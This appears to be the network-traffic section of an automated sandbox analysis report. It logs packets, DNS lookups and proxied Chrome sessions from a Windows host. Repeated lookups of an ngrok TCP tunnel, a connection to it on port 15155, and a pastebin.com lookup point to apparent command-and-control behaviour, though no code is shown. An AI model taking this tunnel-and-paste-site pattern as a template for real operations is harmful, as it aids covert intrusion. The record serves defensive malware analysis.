May 2, 2024 06:04:58.876517057 CEST	49852	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:59.047393084 CEST	15155	49852	3.124.142.205	192.168.2.4
May 2, 2024 06:04:59.558203936 CEST	49852	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:59.727987051 CEST	15155	49852	3.124.142.205	192.168.2.4
May 2, 2024 06:04:59.729626894 CEST	49853	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:59.729664087 CEST	443	49853	104.20.3.235	192.168.2.4
May 2, 2024 06:04:59.732729912 CEST	49853	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:59.733099937 CEST	49853	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:59.733119011 CEST	443	49853	104.20.3.235	192.168.2.4
May 2, 2024 06:04:59.922607899 CEST	443	49853	104.20.3.235	192.168.2.4
May 2, 2024 06:04:59.924115896 CEST	49853	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:59.924141884 CEST	443	49853	104.20.3.235	192.168.2.4
May 2, 2024 06:05:00.148199081 CEST	443	49853	104.20.3.235	192.168.2.4
May 2, 2024 06:05:00.148314953 CEST	443	49853	104.20.3.235	192.168.2.4
May 2, 2024 06:05:00.148791075 CEST	49853	443	192.168.2.4	104.20.3.235
May 2, 2024 06:05:00.149090052 CEST	49853	443	192.168.2.4	104.20.3.235

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 2, 2024 06:00:58.527153969 CEST	53	57515	1.1.1.1	192.168.2.4
May 2, 2024 06:00:58.529095888 CEST	53	51087	1.1.1.1	192.168.2.4
May 2, 2024 06:00:58.757688046 CEST	55204	53	192.168.2.4	1.1.1.1
May 2, 2024 06:00:58.757848978 CEST	55968	53	192.168.2.4	1.1.1.1
May 2, 2024 06:00:58.845825911 CEST	53	55968	1.1.1.1	192.168.2.4
May 2, 2024 06:00:58.846266031 CEST	53	55204	1.1.1.1	192.168.2.4
May 2, 2024 06:00:59.322350025 CEST	53	51449	1.1.1.1	192.168.2.4
May 2, 2024 06:01:06.606307983 CEST	49502	53	192.168.2.4	1.1.1.1
May 2, 2024 06:01:06.694878101 CEST	53	49502	1.1.1.1	192.168.2.4
May 2, 2024 06:01:12.731882095 CEST	50546	53	192.168.2.4	1.1.1.1
May 2, 2024 06:01:12.825881958 CEST	53	50546	1.1.1.1	192.168.2.4
May 2, 2024 06:01:20.705394030 CEST	138	138	192.168.2.4	192.168.2.255
May 2, 2024 06:01:20.922117949 CEST	53	60009	1.1.1.1	192.168.2.4
May 2, 2024 06:01:27.111504078 CEST	53875	53	192.168.2.4	1.1.1.1
May 2, 2024 06:01:27.201317072 CEST	53	53875	1.1.1.1	192.168.2.4
May 2, 2024 06:01:40.263478994 CEST	53	59069	1.1.1.1	192.168.2.4
May 2, 2024 06:01:56.105462074 CEST	52974	53	192.168.2.4	1.1.1.1
May 2, 2024 06:01:56.196322918 CEST	53	52974	1.1.1.1	192.168.2.4
May 2, 2024 06:01:59.388899088 CEST	53	64379	1.1.1.1	192.168.2.4
May 2, 2024 06:02:03.500025988 CEST	53	60335	1.1.1.1	192.168.2.4
May 2, 2024 06:02:12.053330898 CEST	50776	53	192.168.2.4	1.1.1.1
May 2, 2024 06:02:12.160744905 CEST	53	50776	1.1.1.1	192.168.2.4
May 2, 2024 06:02:13.590475082 CEST	55984	53	192.168.2.4	1.1.1.1
May 2, 2024 06:02:13.681421041 CEST	53	55984	1.1.1.1	192.168.2.4
May 2, 2024 06:02:26.594948053 CEST	53	50236	1.1.1.1	192.168.2.4
May 2, 2024 06:02:42.171190977 CEST	61503	53	192.168.2.4	1.1.1.1
May 2, 2024 06:02:42.279515982 CEST	53	61503	1.1.1.1	192.168.2.4
May 2, 2024 06:03:13.523962021 CEST	53	52174	1.1.1.1	192.168.2.4
May 2, 2024 06:03:16.391778946 CEST	60395	53	192.168.2.4	1.1.1.1
May 2, 2024 06:03:16.507287979 CEST	53	60395	1.1.1.1	192.168.2.4
May 2, 2024 06:03:54.904954910 CEST	61445	53	192.168.2.4	1.1.1.1
May 2, 2024 06:03:54.998341084 CEST	53	61445	1.1.1.1	192.168.2.4
May 2, 2024 06:04:19.904566050 CEST	50477	53	192.168.2.4	1.1.1.1
May 2, 2024 06:04:19.994776964 CEST	53	50477	1.1.1.1	192.168.2.4
May 2, 2024 06:04:30.398049116 CEST	53	57138	1.1.1.1	192.168.2.4
May 2, 2024 06:04:45.594362020 CEST	54596	53	192.168.2.4	1.1.1.1
May 2, 2024 06:04:45.701400995 CEST	53	54596	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 2, 2024 06:00:58.757688046 CEST	192.168.2.4	1.1.1.1	0xef91	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
May 2, 2024 06:00:58.757848978 CEST	192.168.2.4	1.1.1.1	0xdece	Standard query (0)	www.google.com	65	IN (0x0001)	false
May 2, 2024 06:01:06.606307983 CEST	192.168.2.4	1.1.1.1	0xc030	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
May 2, 2024 06:01:12.731882095 CEST	192.168.2.4	1.1.1.1	0x52f3	Standard query (0)	0.tcp.eu.ngrok.io	A (IP address)	IN (0x0001)	false
May 2, 2024 06:01:27.111504078 CEST	192.168.2.4	1.1.1.1	0x88b5	Standard query (0)	0.tcp.eu.ngrok.io	A (IP address)	IN (0x0001)	false
May 2, 2024 06:01:56.105462074 CEST	192.168.2.4	1.1.1.1	0xb4bd	Standard query (0)	0.tcp.eu.ngrok.io	A (IP address)	IN (0x0001)	false
May 2, 2024 06:02:12.053330898 CEST	192.168.2.4	1.1.1.1	0x4418	Standard query (0)	0.tcp.eu.ngrok.io	A (IP address)	IN (0x0001)	false
May 2, 2024 06:02:13.590475082 CEST	192.168.2.4	1.1.1.1	0x48f5	Standard query (0)	0.tcp.eu.ngrok.io	A (IP address)	IN (0x0001)	false
May 2, 2024 06:02:42.171190977 CEST	192.168.2.4	1.1.1.1	0x9844	Standard query (0)	0.tcp.eu.ngrok.io	A (IP address)	IN (0x0001)	false
May 2, 2024 06:03:16.391778946 CEST	192.168.2.4	1.1.1.1	0xdc69	Standard query (0)	0.tcp.eu.ngrok.io	A (IP address)	IN (0x0001)	false
May 2, 2024 06:03:54.904954910 CEST	192.168.2.4	1.1.1.1	0x117c	Standard query (0)	0.tcp.eu.ngrok.io	A (IP address)	IN (0x0001)	false
May 2, 2024 06:04:19.904566050 CEST	192.168.2.4	1.1.1.1	0x7e7d	Standard query (0)	0.tcp.eu.ngrok.io	A (IP address)	IN (0x0001)	false
May 2, 2024 06:04:45.594362020 CEST	192.168.2.4	1.1.1.1	0xec25	Standard query (0)	0.tcp.eu.ngrok.io	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
May 2, 2024 06:00:58.845825911 CEST	1.1.1.1	192.168.2.4	0xdece	No error (0)	www.google.com		65	IN (0x0001)	false
May 2, 2024 06:00:58.846266031 CEST	1.1.1.1	192.168.2.4	0xef91	No error (0)	www.google.com	142.251.40.228	A (IP address)	IN (0x0001)	false
May 2, 2024 06:01:06.694878101 CEST	1.1.1.1	192.168.2.4	0xc030	No error (0)	pastebin.com	104.20.3.235	A (IP address)	IN (0x0001)	false
May 2, 2024 06:01:06.694878101 CEST	1.1.1.1	192.168.2.4	0xc030	No error (0)	pastebin.com	104.20.4.235	A (IP address)	IN (0x0001)	false
May 2, 2024 06:01:06.694878101 CEST	1.1.1.1	192.168.2.4	0xc030	No error (0)	pastebin.com	172.67.19.24	A (IP address)	IN (0x0001)	false
May 2, 2024 06:01:12.825881958 CEST	1.1.1.1	192.168.2.4	0x52f3	No error (0)	0.tcp.eu.ngrok.io	18.192.31.165	A (IP address)	IN (0x0001)	false
May 2, 2024 06:01:27.201317072 CEST	1.1.1.1	192.168.2.4	0x88b5	No error (0)	0.tcp.eu.ngrok.io	3.125.102.39	A (IP address)	IN (0x0001)	false
May 2, 2024 06:01:56.196322918 CEST	1.1.1.1	192.168.2.4	0xb4bd	No error (0)	0.tcp.eu.ngrok.io	18.192.31.165	A (IP address)	IN (0x0001)	false
May 2, 2024 06:02:12.160744905 CEST	1.1.1.1	192.168.2.4	0x4418	No error (0)	0.tcp.eu.ngrok.io	3.125.209.94	A (IP address)	IN (0x0001)	false
May 2, 2024 06:02:13.681421041 CEST	1.1.1.1	192.168.2.4	0x48f5	No error (0)	0.tcp.eu.ngrok.io	3.124.142.205	A (IP address)	IN (0x0001)	false
May 2, 2024 06:02:42.279515982 CEST	1.1.1.1	192.168.2.4	0x9844	No error (0)	0.tcp.eu.ngrok.io	18.158.249.75	A (IP address)	IN (0x0001)	false
May 2, 2024 06:03:16.507287979 CEST	1.1.1.1	192.168.2.4	0xdc69	No error (0)	0.tcp.eu.ngrok.io	3.124.142.205	A (IP address)	IN (0x0001)	false
May 2, 2024 06:03:54.998341084 CEST	1.1.1.1	192.168.2.4	0x117c	No error (0)	0.tcp.eu.ngrok.io	3.125.209.94	A (IP address)	IN (0x0001)	false
May 2, 2024 06:04:19.994776964 CEST	1.1.1.1	192.168.2.4	0x7e7d	No error (0)	0.tcp.eu.ngrok.io	3.124.142.205	A (IP address)	IN (0x0001)	false
May 2, 2024 06:04:45.701400995 CEST	1.1.1.1	192.168.2.4	0xec25	No error (0)	0.tcp.eu.ngrok.io	3.125.102.39	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.google.com

fs.microsoft.com

pastebin.com

slscr.update.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	142.251.40.228	443	7256	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:00:59 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-02 04:00:59 UTC	1703	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:00:59 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-pe6bjCzGjkooQS4vmxDPLA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-05-02 04:00:59 UTC	477	IN	Data Raw: 31 64 36 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 74 72 6f 79 20 6d 6f 72 61 6e 20 68 61 72 74 20 68 69 67 68 20 73 63 68 6f 6f 6c 20 70 72 69 6e 63 69 70 61 6c 22 2c 22 61 6d 64 20 73 74 6f 63 6b 73 22 2c 22 64 6f 64 67 65 72 73 20 62 61 73 65 62 61 6c 6c 22 2c 22 74 6f 64 61 79 20 77 6f 72 64 6c 65 20 61 6e 73 77 65 72 22 2c 22 74 61 67 20 68 65 75 65 72 20 66 6f 72 6d 75 6c 61 20 31 20 6b 69 74 68 22 2c 22 63 6f 6e 63 65 72 74 20 77 65 65 6b 20 24 32 35 20 74 69 63 6b 65 74 73 22 2c 22 67 6f 6f 67 6c 65 20 6c 61 79 6f 66 66 73 20 74 6f 64 61 79 22 2c 22 62 6a 20 77 65 73 74 20 64 65 6e 76 65 72 20 62 72 6f 6e 63 6f 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e Data Ascii: 1d6)]}'["",["troy moran hart high school principal","amd stocks","dodgers baseball","today wordle answer","tag heuer formula 1 kith","concert week $25 tickets","google layoffs today","bj west denver broncos"],["","","","","","","",""],[],{"google:clien
2024-05-02 04:00:59 UTC	1255	IN	Data Raw: 62 30 65 0d 0a 76 63 47 35 6e 4f 32 4a 68 63 32 55 32 4e 43 78 70 56 6b 4a 50 55 6e 63 77 53 30 64 6e 62 30 46 42 51 55 46 4f 55 31 56 6f 52 56 56 6e 51 55 46 42 52 44 52 42 51 55 46 43 51 55 4e 42 54 55 46 42 51 55 49 78 54 6e 70 55 53 45 46 42 51 55 46 75 4d 55 4a 4e 56 6b 56 59 4c 79 38 76 4f 45 46 56 63 47 64 42 56 55 70 6a 51 56 4a 77 54 55 46 51 4e 55 46 42 55 31 70 52 51 56 52 61 57 55 46 53 53 6b 6c 42 55 56 70 46 51 56 59 31 64 55 70 76 4f 46 46 42 54 32 38 33 63 6a 63 76 56 55 46 54 4e 56 56 42 54 30 6b 7a 4d 54 6b 76 63 6e 68 59 52 69 38 31 64 7a 68 54 59 58 4e 4e 65 47 35 70 4e 32 46 75 64 58 52 4b 53 32 56 4c 65 6e 70 6d 57 43 39 36 5a 31 6c 51 4f 54 5a 31 63 6a 4e 79 4e 30 51 34 4d 7a 6b 76 4e 48 51 33 61 69 73 34 4c 31 42 32 55 57 74 69 4b Data Ascii: b0evcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBRDRBQUFCQUNBTUFBQUIxTnpUSEFBQUFuMUJNVkVYLy8vOEFVcGdBVUpjQVJwTUFQNUFBU1pRQVRaWUFSSklBUVpFQVY1dUpvOFFBT283cjcvVUFTNVVBT0kzMTkvcnhYRi81dzhTYXNNeG5pN2FudXRKS2VLenpmWC96Z1lQOTZ1cjNyN0Q4MzkvNHQ3ais4L1B2UWtiK
2024-05-02 04:00:59 UTC	1255	IN	Data Raw: 69 39 4c 65 54 64 56 59 53 39 47 51 32 31 44 65 6a 68 4d 56 56 56 6a 53 48 56 56 4e 31 59 79 52 53 74 76 62 47 51 34 64 6d 6c 43 4e 54 4a 50 55 48 5a 50 4e 32 70 6f 62 44 6c 61 4f 56 55 34 4f 46 5a 72 55 45 73 30 4e 44 5a 49 52 30 6c 36 61 55 39 55 53 43 74 79 5a 54 55 32 55 55 78 45 55 69 39 52 57 6b 56 57 62 6a 49 72 63 30 70 49 53 47 68 48 54 30 59 32 53 45 4d 30 62 46 6c 35 4d 54 6b 33 57 47 46 52 64 6b 39 68 57 54 42 50 61 57 68 30 62 44 46 7a 64 57 46 4c 65 6b 68 5a 61 32 46 70 57 45 55 32 59 32 52 72 63 6d 6c 4d 65 57 38 31 52 6a 42 6a 4d 6b 70 34 4d 48 4a 79 54 33 5a 58 51 56 63 31 61 6c 68 69 59 6c 41 35 59 6c 70 74 4f 55 56 31 61 55 74 71 53 30 31 6b 62 55 6c 5a 51 7a 4a 48 65 55 74 5a 61 57 6c 52 5a 47 56 43 56 33 6c 6f 55 6a 64 6c 52 6a 6c 4a Data Ascii: i9LeTdVYS9GQ21DejhMVVVjSHVVN1YyRStvbGQ4dmlCNTJPUHZPN2pobDlaOVU4OFZrUEs0NDZIR0l6aU9USCtyZTU2UUxEUi9RWkVWbjIrc0pISGhHT0Y2SEM0bFl5MTk3WGFRdk9hWTBPaWh0bDFzdWFLekhZa2FpWEU2Y2RrcmlMeW81RjBjMkp4MHJyT3ZXQVc1alhiYlA5YlptOUV1aUtqS01kbUlZQzJHeUtZaWlRZGVCV3loUjdlRjlJ
2024-05-02 04:00:59 UTC	327	IN	Data Raw: 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 72 65 6c 65 76 61 6e 63 65 22 3a 5b 31 32 35 37 2c 31 32 35 36 2c 31 32 35 35 2c 31 32 35 34 2c 31 32 35 33 2c 31 32 35 32 2c 31 32 35 31 2c 31 32 35 30 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 73 75 62 74 79 70 65 73 22 3a 5b 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 Data Ascii: 002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype
2024-05-02 04:00:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	142.251.40.228	443	7256	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:00:59 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-02 04:00:59 UTC	1843	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGPufzLEGIjDqkokB_Yx903z9S8-TdyWhW8iPlrZBrgRiiMPzrxlLxgoQH634QKXADTY9t1vdNmMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwI-5_MsQYQ4pjfuwISBL9gluE Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Thu, 02 May 2024 04:00:59 GMT Server: gws Content-Length: 458 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-05-02-04; expires=Sat, 01-Jun-2024 04:00:59 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=TDdb6B1qf0imS6sQ9UI386TSBmUeGbONEAs1g_SjFnFVZT8tlWjduo1BWv8tK_X2kdpw5DyqH6DyKssZClnoNAKybygsq-HKlTpEzxscqZJ_pjS1BKmEZAqlwshMLYfbeJHYWJdOjDcEir8XmubnkA88KvIUU07OLdpJjmvAUwk; expires=Fri, 01-Nov-2024 04:00:59 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-02 04:00:59 UTC	458	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49735	142.251.40.228	443	7256	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:00:59 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-02 04:00:59 UTC	1761	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGPufzLEGIjDTt_akc_527nJ4zoGCbAZn0AkDcVIV2VLuAM78mz4Tuc4onQdlIzVDE6yNOrZBZH0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwI-5_MsQYQoY6IyAISBL9gluE Content-Type: text/html; charset=UTF-8 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Thu, 02 May 2024 04:00:59 GMT Server: gws Content-Length: 417 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-05-02-04; expires=Sat, 01-Jun-2024 04:00:59 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=aQLl8l_IdrdIG_vG9LZErLEffD0-yJ-HZriWrJveyjO1itgPJ6dl8zB9N0d-QezZoOt2n3nDN-AnNT-K9r0paQnY7wviknPkibpSoCsSrQVL1ZjpMYLQ1zLgwfC-Lo9S6ISgMklsM0jGn4_SiIk4-TVyzohylPezEXFI0fi2jmA; expires=Fri, 01-Nov-2024 04:00:59 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-02 04:00:59 UTC	417	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49736	142.251.40.228	443	7256	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
